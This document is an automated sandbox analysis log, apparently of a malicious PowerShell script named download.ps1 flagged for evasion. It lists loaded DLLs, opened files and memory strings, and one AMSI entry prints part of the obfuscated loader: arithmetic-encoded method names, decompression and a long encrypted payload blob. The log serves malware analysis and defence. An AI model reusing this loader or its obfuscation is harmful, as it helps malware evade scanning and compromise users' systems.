Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.1393644816.00000235817E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: i/google-gemini-ai-holiday-planning-2024/%3Futm_source%3Dhpp%26utm_medium%3Dreferral&amp;source=hpp&amp;id=19046184&amp;ct=3&amp;usg=AOvVaw0wTMtITXLpc8KeH3Y4fICW&amp;sa=X&amp;ved=0ahUKEwiXo8fT47aKAxVa3jQHHcR7GSoQ8IcBCAY" rel="nofollow">5 ways Gemini can help during the Holidays</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="q0Qh02Fx1ZnHOkNjcAOMoA">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="q0Qh02Fx1ZnHOkNjcAOMoA">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="q0Qh02Fx1ZnHOkNjcAOMoA">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1393644816.0000023581EC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: classification engineClassification label: mal68.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5112:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2chukqj.1ra.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $86zuy3xghtrqwve.(([char[]]@((-8759+(12159-3333)),(1082583/(10676-923)),(-1256+1368),(-4028+(-1825+(15221752/2548))),(9559-9475),(5516-(5445-(-610+(-4271+4921))))) -join ''))( $pt7afszmng9hol5 ) $86zuy3xghtrqwve.((-join (@((354296/5288),(-3056+3164),(571761/5151),(-10032+10147),(4537-4436))| ForEach-Object { [char]$_ })))()$eni4vzuxs2d5yoa.(([char[]]@((658208/(13365-3541)),(-9358+(10414-948)),(633699/(22875963/(30549368/7624))),(742670/6458),(-7430+7531)) -join ''))()[byte[]] $bxrc2jni4slugvt = $pt7afszmng9hol5.(([system.String]::new(@((981-897),(4326-4215),(-5367+(7729736/(-8618+(12028-(487+1500))))),(-4969+5083),(8315-(1920+6281)),(-5956+(11228-(45384750/8770))),(-6445+6566)))))() $cs3pj58qgiuek20=$bxrc2jni4slugvt return $cs3pj58qgiuek20}[System.Text.Encoding]::ascii.(([system.String]::new(@((304022/4282),(324008/(12915408/4026)),(898884/(13560750/1750)),(411182/4954),(7058-(493+6449)),(2257-(-3233+(9152-(12961-9185)))),(39900/(6930-(14782-(68506704/(9823-(1812-311)))))),(-8266+(5951+2425)),(2783-(19467520/7264))))))((nghl3ewmdia0bvsr1z6kjfo9x5q "Kb44enhqZjlvd8TybbolLQ6t+VqiqIimFAaXKSu+2GbnJ0sjBEz69uwTrroOMum1MEZZVPVbkMHQkJ4xnTtEuWhKLCWypxQg45uNrYI1sGNeKBefk8hDmf8tcU6ES5OUyIbD/fc1uYcaiZqXi6KndVb0uoITBRCQxdCdYUfV2EGdj4Dl2dvMgquXvf4USNYyydbZZVd0WUQSDpeSmaJHVCfUXoISyxf3rfJflKXVlcXwGNaTodZB3EK8BbJaWVD6QkPG/RuBX5SsJTIgH5Gd92GfhQ0IWQBVmBzHzmQJ+QidZ5Eve4DA+UooOrZSoNhy4Qf3JgKDhfWUmGapLA+n18uMoq4ZvDiRu1zEw7Y71UYBukrpE/rsgzPk94YFTuXCidDirJsCy5Xeswe5+gZBgWmfqytgvDE9rXSbk0XF+7KyEjplE/Hd4grBE82q+o7CQ7gRouWTIvby0PfPmQlrmnE98OP8FCLbgWlJiOq4OtsHjp0m3TkBVUvMCkaCQkayX8ff5j40lNE2aFXCCWsMAgqSm9ZS/QYwiktBA4aSgGZE6FYWxPaHJQeXgsW+5hoGB7mSH91yNNkkXu2Gwb2KPbKzqJnaFjPnwEddw83PqWAXQlTc0cleiJfyDPFXNgWYjSuFVyNBG9NZDoOKwirN90vD82LsrWux7H/TKY7bNl+xlXWYh/uWid14zBZAn7kdW1YdwzY1J1oqsHUUartNLK6yIRlR1dfYqUWdVxU/LQdQja+eyrJTE/siRqMZuAznF2MLG3rj1ZFKHWAF0md7FjEV74iDiyPeCbIJOaEMqXQk7A4yTd/lxbuUo6+ezlOVbLbOTgtIBo4qb4Mtm9zwc3Z8qBDss47ZrCFVDIEysNrHysXNzI+Ed85xEOQ6T9TeuwVEsSCxMhvn33bIKrZtHrSq/9x3UKZdW/Z2kg3c6xqP75cYzub1iQfRFdaVjf7VCavvwUSWHIkvip+oSSpOGWU1GMiJouqlTcK/TVb12QVUjJylGcvRrROTGWGk6HQASkrXq/OZuTfUqRGXxuuD8a+hi/qavwB9gal4nLb3Nh8OfgRsvvL+PhTlAxNpDUzr1Xms50Y8TPYs2wUpZpVFGOt3/USkntrr9ZkNUxZZ+WVGmvpraSosOuOc12LszKah2QmMD4CHZXK9hNXd1Kdj99sY2yfwJdvbd3s7BRrd0xKoYukqsrd34yfZmOUykAVUu2l+UaXkewmJRc0XAaXSUfwLDabZN7tdQwMXDqhaq4qe37LtABzWvlYCC+XTcZlnrv6yMn/UEadBAbtcptTcI/b//iNyj3RHtvbwKfRJF7ReLrl5VOYntY4MqHtwKhptGq5AzXACXoC786Lqxf2KRRg2rJWVl0X7CiysEHPTkXP5x/4P4EB08ZY/r+p8YfWw6z/Ohb75Md4kaHk8wWrsBwGRDj2YKOZx2jRKAu8yuN2Yxv5+vrVZU7ApMLdB0TA4dZM+Iv6L3nLd22NxpKxvYjrepyBidzoEc2Qo2/B3rxqszHtjjAUAQoy3snp2fSsOlbmYWlFHw1xPqG8ThCMRIUquzUobuHB1sYRBBTsi5D7vS8+vl2OCxfAfanlN921ILf2zflg6rPrVtchrKzy0eUNDlBoLvVpsArUvlq2TfQA1N8M46UVRtgvECv6XH78x6+ZFjl1ku6CMOymiPtFUVzzQW7udboFJU8cqWxEpfsHJGqq4jWOd6+UkkK5Se6lVSu/rSvSItsGe4eJ/GDpjP09aw0YWNQR+o1jRmgST4ogN81jucN1YXdq2LvR5JeigIkU0U89gS7Te5vPQP0VpqpH7qUqg/azh2vAlpwp6ZzDZto3XRsJRoUJ/ECIQkwkhquBeXcb4ZURCup
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1428627321.00000235E907E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1431782162.00000235E938D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbGC source: powershell.exe, 00000000.00000002.1430212250.00000235E9284000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1431782162.00000235E9425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.1430212250.00000235E9284000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1430212250.00000235E92EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbllu8w source: powershell.exe, 00000000.00000002.1431782162.00000235E938D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1431782162.00000235E9425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1428627321.00000235E907E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbv source: powershell.exe, 00000000.00000002.1431782162.00000235E9425000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC35D2A5 pushad ; iretd 0_2_00007FFAAC35D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC474FA5 push edi; ret 0_2_00007FFAAC474FA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC47E3CF push eax; iretd 0_2_00007FFAAC47E3E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC47CBDA pushad ; retf 0_2_00007FFAAC47CBDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC6CC3B4 pushad ; ret 0_2_00007FFAAC6CC3B5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC6CC3AC pushad ; retn 0000h0_2_00007FFAAC6CC3AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC6CCBE4 pushfd ; retf 0_2_00007FFAAC6CCBE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC6CF86B push eax; iretd 0_2_00007FFAAC6CFB69
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFAAC6E5170 pushad ; ret 0_2_00007FFAAC6E5171

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
